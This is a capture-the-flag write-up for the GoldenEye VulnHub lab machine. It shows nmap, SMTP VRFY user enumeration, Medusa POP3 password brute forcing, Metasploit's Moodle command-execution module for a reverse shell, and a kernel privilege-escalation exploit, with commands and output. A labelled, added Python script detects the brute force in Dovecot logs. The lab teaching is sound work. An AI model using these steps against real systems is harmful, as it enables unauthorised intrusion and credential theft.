GoldenEye CTF

This article covers a brief walk-through of a GoldenEye themed VulnHub system. Based on the system's description, brute forcing was going to be key:

  • No extra tools other than what’s on Kali by default
  • Any brute forcing will only need fasttrack.txt or less

Scanning & Enumeration

I started by port scanning the system. POP3 looks like a good brute force candidate.

nmap -sV -p- 192.168.0.108
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 18:41 EST
Nmap scan report for 192.168.0.108
Host is up (0.00023s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open  ssl/pop3 Dovecot pop3d
55007/tcp open  pop3     Dovecot pop3d
MAC Address: 08:00:27:... (Oracle VirtualBox virtual NIC)

Heading to the web server, a login console also appears to be available:

[Screenshot: "GoldenEye Primary Admin" page at http://192.168.0.108/ reading "Severnaya Auxiliary Control Station - SECRET - Accessing Server Identity - Server Name: GOLDENEYE - User: UNKNOWN - Navigate to /sev-home/ to login".]

The source code (terminal.js) behind this message reveals two potential user names and an encoded password:

[Screenshot: view-source:http://192.168.0.108/terminal.js. The script holds the page text in a data array and a small loop that writes data[0] into the page elements by id; the interesting part is the comment block, which reads:]

//Boris, make sure you update your default passwrd.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic..
//I encoded you ... below...
//BTW Natalya says she can break your codes

I decoded the password (InvincibleHack3r) with Burp Suite's Decoder tab.

Connecting to the SMTP port, I used the VRFY command to check if these users exist on the system:

telnet 192.168.0.108 25
Trying 192.168.0.108...
Connected to 192.168.0.108.
Escape character is '^]'.
220 ubuntu GoldenEye SMTP Electronic-Mail agent
VRFY test
550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table
VRFY natalya
252 2.0.0 natalya
VRFY boris
252 2.0.0 boris
VRFY james
550 5.1.1 <james>: Recipient address rejected: User unknown in local recipient table

Logging in with the Boris/InvincibleHack3r account, we appear to hit a dead end:

[Screenshot: http://192.168.0.108/sev-home/ after logging in. The page reads: "GOLDENEYE is a Top Secret Soviet orbital weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO). Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an administrator of the GoldenEye system. ... we have configured our pop3 service to run on a very high non-default port."]

Brute Forcing

Using Medusa and the fasttrack.txt wordlist, I attempted to brute force the passwords for the two accounts previously identified:

medusa -u boris -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -v 0
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: boris (1 of 1, 0 complete) Password: Company123 (139 of 221 complete)
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: boris (1 of 1, 0 complete) Password: company1! (140 of 221 complete)
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: boris (1 of 1, 0 complete) Password: secret1! (141 of 221 complete)
ACCOUNT FOUND: [pop3] Host: 192.168.0.108 User: boris Password: secret1! [SUCCESS]

Valid Account: boris:secret1!

medusa -u natalya -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -f
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: natalya (1 of 1, 0 complete) Password: password! (100 of 221 complete)
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: natalya (1 of 1, 0 complete) Password: sqlaccount (101 of 221 complete)
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: natalya (1 of 1, 0 complete) Password: bird (102 of 221 complete)
ACCOUNT FOUND: [pop3] Host: 192.168.0.108 User: natalya Password: bird [SUCCESS]

Valid Account: natalya:bird
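The defender's view of this step, as an added example that is not part of the original walkthrough: Dovecot writes one pop3-login line per failed or successful login, including the source address (rip=), so a short script can surface the burst of failures a 20-thread Medusa run produces and whether a login from the same source succeeded afterwards. The log lines, addresses, session ids and thresholds below are constructed assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Dovecot pop3-login syslog line: "<ts> <host> dovecot: pop3-login: <event>: user=<u>, ..., rip=<src>, ..."
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>, .*?rip=(?P<rip>[\d.]+)")

def parse(lines, year=2019):
    """Yield (timestamp, login_ok, user, source_ip) for each matching pop3-login line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["event"] == "Login", m["user"], m["rip"]

def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Flag source IPs with >= threshold auth failures inside a sliding window.
    Each alert records the failure count, the usernames tried and any login that
    later succeeded from the same source (the sign that a guessed password worked)."""
    recent = defaultdict(list)   # rip -> failure timestamps still inside the window
    users = defaultdict(set)     # rip -> usernames seen failing from that source
    alerts = {}
    for ts, ok, user, rip in parse(lines):
        if ok:
            if rip in alerts:
                alerts[rip]["success_after_spray"] = (user, ts)
            continue
        users[rip].add(user)
        recent[rip] = [t for t in recent[rip] if ts - t <= window] + [ts]
        if rip in alerts:
            alerts[rip]["failures"] += 1
        elif len(recent[rip]) >= threshold:
            alerts[rip] = {"first_seen": recent[rip][0], "failures": len(recent[rip]),
                           "users": users[rip], "success_after_spray": None}
    return alerts

def _line(sec, event, user, rip):
    # Builds a constructed log line in the Dovecot format above (hypothetical host "ubuntu").
    return (f"Feb 17 18:50:{sec:02d} ubuntu dovecot: pop3-login: {event}: "
            f"user=<{user}>, method=PLAIN, rip={rip}, lip=192.168.0.108, session=<s{sec}>")

FAIL = "Disconnected (auth failed, 1 attempts in 2 secs)"
# Constructed sample: 20 failures in three seconds from one source (the burst a 20-thread
# Medusa run produces), then a successful login from that source, plus one benign
# mistype from another host. Addresses and session ids are made up for this example.
SAMPLE_LOG = [_line(i // 7, FAIL, "boris", "192.168.0.5") for i in range(20)]
SAMPLE_LOG += [_line(9, "Login", "boris", "192.168.0.5"),
               _line(30, FAIL, "natalya", "192.168.0.20"),
               _line(45, "Login", "natalya", "192.168.0.20")]
```

Running detect_bruteforce over the sample flags only 192.168.0.5, with 20 failures against boris followed by a successful login from the same address; the single failure from 192.168.0.20 stays below the threshold.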

I configured Claws Mail to see if anything interesting appeared in these email accounts:

[Screenshot: Claws Mail 3.17.3 inbox for boris (3 messages), with the selected message from natalya@ubuntu, 21/04/95 (Fri):]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these access codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages.

PS - Keep security tight or we will be compromised.

This revealed more credentials:

username: xenia
password: RCP90rulez!

[Screenshot: Claws Mail 3.17.3 inbox for natalya (5 messages), with the selected message from root@ubuntu, Date: Tue, 29 Apr 1995 -0700 (PDT):]

Ok Natalya I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially if it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:
username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on our internal Domain: severnaya-station.com/gnocertdir
make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

Logging into the URL mentioned in the email (severnaya-station.com/gnocertdir) presents us with a Moodle CMS website, where a message from Dr. Doak awaits:

[Screenshot: Moodle message to Xenia, 09:24 PM: "Greetings. As a contractor to our GoldenEye ... your account has been completed ... courses will appear on your dashboard. If you have any questions, email me, not here. My email username is..." followed by a long signature block for Dr Doak "The Doctor", Training Scientist, GoldenEye Operations Center, with office, cell and phone numbers, two quotes, and "THIS IS A SECURE MESSAGE DO NOT SEND UNLESS...".]

Poking around the Moodle application didn't reveal much of interest, so it was time for more brute force:

medusa -u doak -P /usr/share/wordlists/fasttrack.txt -h 192.168.0.108 -M pop3 -n 55007 -t 20 -b -f
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: doak (1 of 1, 0 complete) Password: goat (121 of 221 complete)
ACCOUNT FOUND: [pop3] Host: 192.168.0.108 User: doak Password: goat [SUCCESS]
ACCOUNT CHECK: [pop3] Host: 192.168.0.108 (1 of 1, 0 complete) User: doak (1 of 1, 1 complete) Password: dev (122 of 221 complete)

Valid Account: doak:goat

Logging into the email account, more credentials were uncovered:

username: dr_doak
password: 4England!

[Screenshot: Claws Mail 3.17.3 inbox for doak (6 messages, from root@ubuntu, alec@janus.boss, natalya@ubuntu and root@127.0.0.1), with the selected message from doak@ubuntu, Date: Tue, 30 Apr 1995 -0700 (PDT):]

James,

If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information.

username: dr_doak
password: 4England!

Logging into the Moodle website using the Dr. Doak account, we find a s3cret.txt file:

[Screenshot: Moodle "My private files" page at severnaya-station.com/gnocertdir/user/files.php, logged in as Dr Doak, under Navigation > My profile > My private files.]

The contents of the file point to a .jpg file:

[Screenshot: s3cret.txt opened in a text editor:]

007,

I was able to capture this apps admin cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Downloading the image shows the following:

[Image: for-007.jpg, a GoldenEye still whose caption is only partly legible: "Dr_Do... ... Good luck 007".]

And since it wouldn't be a CTF without exiftool being required...

exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Image Description   |GoldenEye
Resolution Unit     |Inch
Software            |linux
Artist              |For James
YCbCr Positioning   |Centred
Exif Version        |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment        |eFdpbnRlcjE5OTV4IQ==
FlashPixVersion     |FlashPix Version 1.0
Colour Space        |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
(The Manufacturer, X-Resolution and Y-Resolution values are not legible in the screenshot.)

echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d
xWinter1995x!

password: xWinter1995x!

Using this password, I was then able to log in as an admin to the Moodle application:

[Screenshot: Moodle "Site administration > Server > Environment" page at severnaya-station.com/gnocertdir/admin/environment.php, logged in as Admin. The page shows "GoldenEye Operators Training - Moodle", Moodle version 2.2.3 (Build: 20120514), and the server checks for the PHP extensions (xmlrpc, gd, and others), database version and related installation requirements.]

Remote Access

Metasploit includes a Moodle CMS module, which allows for code execution provided you have an admin account, so I thought I would give that a try.

msf5 exploit(multi/http/moodle_cmd_exec) > show options

Module options (exploit/multi/http/moodle_cmd_exec):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   xWinter1995x!          yes       Password to authenticate with
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.0.108          yes       The target address range or CIDR identifier
   RPORT      80                     yes       The target port (TCP)
   SESSKEY                           no        The session key of the user to impersonate
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /gnocertdir            yes       The URI of the Moodle installation
   USERNAME   admin                  yes       Username to authenticate with
   VHOST      severnaya-station.com  no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

The module injects code into the aspell system path to gain a reverse shell; however, my first attempt didn't work out.

[Screenshot: Moodle "Site administration > Server > System paths" page. GD version: "GD 2.x is installed"; Path to du: empty; Path to aspell: empty, with the help text "To use spell-checking within the editor, you MUST have aspell 0.50 or later installed on your server, and you must specify the correct path to access the aspell binary. On Unix/Linux systems, this path is usually /usr/bin/aspell, but it might be something else."]

After some time poking around the site settings, this appeared to be because a different spell check system was being invoked. I headed over to Site Administration > Plugins > Text Editors and set the spell engine to PSpellShell.


Success!


Privilege Escalation

After running "uname -a", it appeared the system was running kernel 3.13.0-32-generic, which is vulnerable to the following exploit: https://www.exploit-db.com/exploits/37292. I copied the exploit across from my Kali system.


Unfortunately, gcc wasn't available to compile the exploit; however, the system does have the Clang compiler installed.


I modified the exploit so that references to gcc were replaced with clang, and compiled it. This generated some warnings, but did produce an "a.out" executable.


Executing it, we get a root shell.


Checking out the /root directory, we can see a .flag.txt file.


Visiting the URL in the flag file shows the flag has been captured.


Victory. It’s quite a fun challenge with a couple of small curve-balls. Could be improved by the addition of Defense Minister Dmitri Mishkin 😉
